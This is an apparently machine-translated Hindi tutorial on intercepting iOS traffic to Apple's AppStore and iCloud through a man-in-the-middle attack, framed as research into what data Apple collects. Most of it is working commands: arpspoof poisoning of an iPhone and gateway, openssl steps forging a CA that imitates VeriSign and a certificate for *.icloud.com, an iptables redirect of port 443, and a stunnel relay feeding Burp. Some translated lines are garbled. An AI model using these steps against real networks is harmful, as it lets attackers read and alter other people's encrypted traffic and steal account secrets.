AppStore और iCloud यातायात प्रकटीकरण

नीचे उस तकनीक का वर्णन है जिसके द्वारा आप उन प्रोटोकॉल को डिक्रिप्ट कर सकते हैं जिनके द्वारा iOS Apple सेवाओं (AppStore, iCloud, आदि) के साथ संचार करता है। यह तकनीक सेवाओं के संचालन को समझने के लिए, और इस सवाल के व्यापक उत्तर के लिए उपयोगी हो सकती है कि Apple आपके डिवाइस से कौन सा डेटा लेता है।

हमला कई चरणों में किया जाता है:
स्टैंड की 1 विधानसभा।
2 यातायात प्रबंधन।
3 स्व-निर्मित सीए की पीढ़ी और स्थापना।
4 Apple सेवाओं के लिए नकली प्रमाण पत्र बनाएं और उन्हें स्व-घोषित सीए के साथ साइन करें।
5 प्राप्त प्रमाण पत्रों का उपयोग करके एक MITM हमले का संचालन करना

1. स्टैंड की विधानसभा

हमलावर के कंप्यूटर और ऐप्पल डिवाइस को समान L2 (802.11) नेटवर्क पर रखा गया है। इसके अलावा, उपकरणों को एक L3 सबनेट में दर्ज किया जाता है, उदाहरण के लिए 192.168.1.0/24। सबनेट के लिए, इंटरनेट रूटिंग को कॉन्फ़िगर करना होगा। हमलावर हमला करने के लिए सबसे अधिक संभावना लिनक्स का उपयोग करेगा।

2. यातायात प्रबंधन

हमलावर, विशेष रूप से निर्मित ARP पैकेट्स को बनाते हुए, यह सुनिश्चित करता है कि जिस उपकरण पर हमला किया जा रहा है, उस पर उसका मैक पता नेटवर्क गेटवे के साथ जुड़ा हो और गेटवे के लिए, हमलावर, उसी सिद्धांत से, डिवाइस पर हमला किया जा रहा हो। नतीजतन, गेटवे और हमला किए गए डिवाइस के बीच दोनों दिशाओं में सभी ट्रैफ़िक हमलावर के कंप्यूटर से गुजरते हैं (इस राज्य को प्राप्त करने के 100500 तरीके हैं, arpspoof शायद सबसे आसान है अगर गेटवे पर कोई नियंत्रण नहीं है)। इस स्थिति में सफलतापूर्वक काम करने के लिए, आपको हमलावर के कंप्यूटर में पैकेट अग्रेषित करने में सक्षम करना होगा, यह किया जाता है
sysctl -w net.ipv4.ip_forward=1
#
echo 1 > /proc/sys/net/ipv4/ip_forward

Spoofing पुराने और विश्वसनीय arpspoof का उपयोग करता है:
#192.168.1.101 - iphone
#192.168.1.101 -
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.101
#

आप अटैक किए गए आईपी के लिए फिल्टर सेट करके वेर्शक के माध्यम से ट्रैफ़िक अवरोधन की सफलता को सत्यापित कर सकते हैं (क्योंकि वायर्डिंग के दौरान वॉयरसर्क एक पैकेट को दो बार देखेगा, यह उन्हें डरावने रंग के साथ चिह्नित करेगा और रिट्रांसमिट्स पर शपथ देगा, लेकिन उन्हें फ़िल्टर किया जा सकता है)

3. स्व-निर्मित सीए की पीढ़ी

यहां एक सैद्धांतिक विषयांतर आवश्यक है, क्योंकि समाधान स्पष्ट होने से पहले, मुझे प्रयोग करना था। IOS में सभी नियमित प्रमाणीकरण प्रक्रियाएं (पासवर्ड, मेल, वाईफाई से प्रमाण पत्र आदि) सुरक्षा डेमॉन से गुजरती हैं, जो हर बार प्रमाणीकरण प्रक्रिया से गुजरने की जरूरत होती है। सभी डेटा (प्रमाणीकरण रहस्य, इत्यादि) जो डेमॉन उपयोग साइक्लाइट डेटाबेस (कीचेन-2. डीबी) में संग्रहीत हैं, जो पुराने फर्मवेयर के साथ मेरे गंदे आईपैड पर स्थित है:
iPad:/private/var/Keychains root# uname -a
Darwin iPad 10.4.0 Darwin Kernel Version 10.4.0: Wed Oct 20 20:14:45 PDT 2010; root:xnu-1504.58.28~3/RELEASE_ARM_S5L8930X iPad1,1 arm K48AP Darwin
iPad:/private/var/Keychains root# pwd
/private/var/Keychains
iPad:/private/var/Keychains root# ls -liahs keychain-2.db
147473 112K -rw------- 1 _securityd wheel 112K Dec 19 00:11 keychain-2.db
( , )
, , .

चूंकि आईफ़ोन को आईक्लाउड या ऐपस्टोर से कनेक्ट करते समय, सर्वर एक प्रमाण पत्र के साथ प्रमाणित करता है, यह पहले स्पष्ट नहीं था कि प्रमाणीकरण सफल क्यों था, भले ही स्टोरेज को हटा दिया गया हो या हटा दिया गया हो। आगे के अध्ययनों से पता चला है कि कुछ CAs, जिनमें VeriSign CA (जो Appple सर्वर प्रमाणपत्र द्वारा प्रमाणित हैं) शामिल हैं, को सीधे सुरक्षा निष्पादन योग्य फ़ाइल में वायर्ड किया गया था, जहाँ से, जाहिरा तौर पर, उन्हें Apporeore से कनेक्ट करते समय सर्वर प्रमाणीकरण प्रक्रिया के लिए लिया गया था।

IPhone पर मूल CA उपकरण डिज़ाइन किए गए हैं ताकि उपयोगकर्ता अपने CA को iPhone पर जोड़ सके, जो कि, जाहिरा तौर पर, किसी भी उपयोगकर्ता सिस्टम को प्रमाणित करने में मदद करना चाहिए। हालांकि, तंत्र इस तरह से काम करता है कि कुछ भी हमें iPhone पर हमारे "स्व-घोषित" सीए को स्थापित करने से रोकता है, जिसका उपयोग हमारे द्वारा * .itunes.apple.com और * .icloud.com के लिए बनाए गए नकली प्रमाणपत्रों को प्रमाणित करने के लिए किया जाएगा (क्यों Apple यह एक अलग मुद्दा है)। )। क्या उल्लेखनीय है, यह प्रक्रिया नियमित है और इसके लिए किसी जेलब्रेक की आवश्यकता नहीं है।

मैंने इस तरह से सीए बनाया:
[20:36:02 dev@sandbox:~/CA]$openssl req -new -x509 -days 3650 -extensions v3_ca -keyout private/cakey.pem -out cacert.pem
Generating a 1024 bit RSA private key
.........................................................................++++++
.........................................++++++
writing new private key to 'private/cakey.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:VeriSign
Locality Name (eg, city) []:VeriSign Trust Network
Organization Name (eg, company) [Internet Widgits Pty Ltd]:VeriSign Inc
Organizational Unit Name (eg, section) []:Terms of use at www.verisign.com/rpa (c)09
Common Name (eg, YOUR name) []:VeriSign Class 3 Secure Server CA - G2
Email Address []:

परिणामस्वरूप cacert.pem को मेल के लिए अनुलग्नक के रूप में, iPhone पर भेजा जा सकता है, स्थापना सीधे पत्र से संभव है।

4. Apple सेवाओं के लिए फर्जी प्रमाणपत्र बनाएं

इसे 2 चरणों में किया जाता है: पहले हम एक अनुरोध उत्पन्न करते हैं, फिर हम इसे अपने सीए के साथ हस्ताक्षरित करते हैं:
[21:10:52 dev@sandbox:~/CA]$openssl req -new -nodes -out my_icloud_apple_req.pem -keyout my_icloud_apple_key.pem
Generating a 1024 bit RSA private key
......++++++
.++++++
writing new private key to 'my_icloud_apple_key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:california
Locality Name (eg, city) []:cupertino
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Apple Inc
Organizational Unit Name (eg, section) []:iTMS
Common Name (eg, YOUR name) []:*.icloud.com
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
[22:42:33 dev@sandbox:~/CA]$openssl x509 -req -days 365 -in my_icloud_apple_req.pem -CA cacert.pem -CAkey private/cakey.pem -set_serial 01 -out my_icloud_apple_cert.pem
Signature ok
subject=/C=US/ST=california/L=cupertino/O=Apple Inc/OU=iTMS/CN=*.icloud.com
Getting CA Private Key
Enter pass phrase for private/cakey.pem:
[22:44:20 dev@sandbox:~/CA]$
# appstore


5. प्राप्त प्रमाण पत्रों का उपयोग करके MITM हमले का संचालन करना

जब हमने अपने आप से ट्रैफ़िक पास किया और प्रमाण पत्र के साथ वर्णित सब कुछ किया, तो हमें हमारे लिए ब्याज की सेवाओं के लिए सभी कनेक्शनों को रोकना होगा और उन्हें हमारे डिजाइन से पारित करना होगा। आप इसे गूंगे और विश्वसनीय तरीके से कर सकते हैं: पोर्ट 443 पर सभी कनेक्शनों को रोकना:
iptables -A FORWARD -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8443

इसलिए आईफोन के साथ 443 पर सभी कनेक्शन एक निश्चित इकाई में स्थानांतरित हो जाएंगे जो स्थानीय रूप से पोर्ट 8443 पर सुनेंगे। मेरे मामले में, यह निम्नलिखित विन्यास के साथ एक स्टनलाइन था:
; PID is created inside the chroot jail
pid = /stunnel.pid
; Debugging stuff (may useful for troubleshooting)
debug = 7
output = /var/log/stunnel.log

;
cert = /home/dev/CA/my_icloud_apple_cert.pem
key = /home/dev/CA/my_icloud_apple_key.pem

; Disable support for insecure SSLv2 protocol
options = NO_SSLv2

; https 8443 9000
[https_s]
accept = 0.0.0.0:8443
connect = 0.0.0.0:9000

; 9500 , https icloud
[https_c]
client = yes
accept = 0.0.0.0:9500
connect = 17.172.208.53:443

जैसा कि आप इस कॉन्फ़िगरेशन से देख सकते हैं, सर्किट को बंद करने के लिए, आपको 9000> 9500 के साथ एक प्रॉक्सी की आवश्यकता है, जिसके माध्यम से ट्रैफ़िक स्पष्ट रूप से गुजर जाएगा, मैं इसके लिए Burp का उपयोग करता हूं:

यही है, अब आप Apple प्रोटोकॉल का अध्ययन कर सकते हैं और अंत में, यह जान सकते हैं कि आपके व्यक्तित्व के कौन से रहस्य सीधे क्यूपर्टिनो = के अंधेरे तहखानों में उड़ते हैं)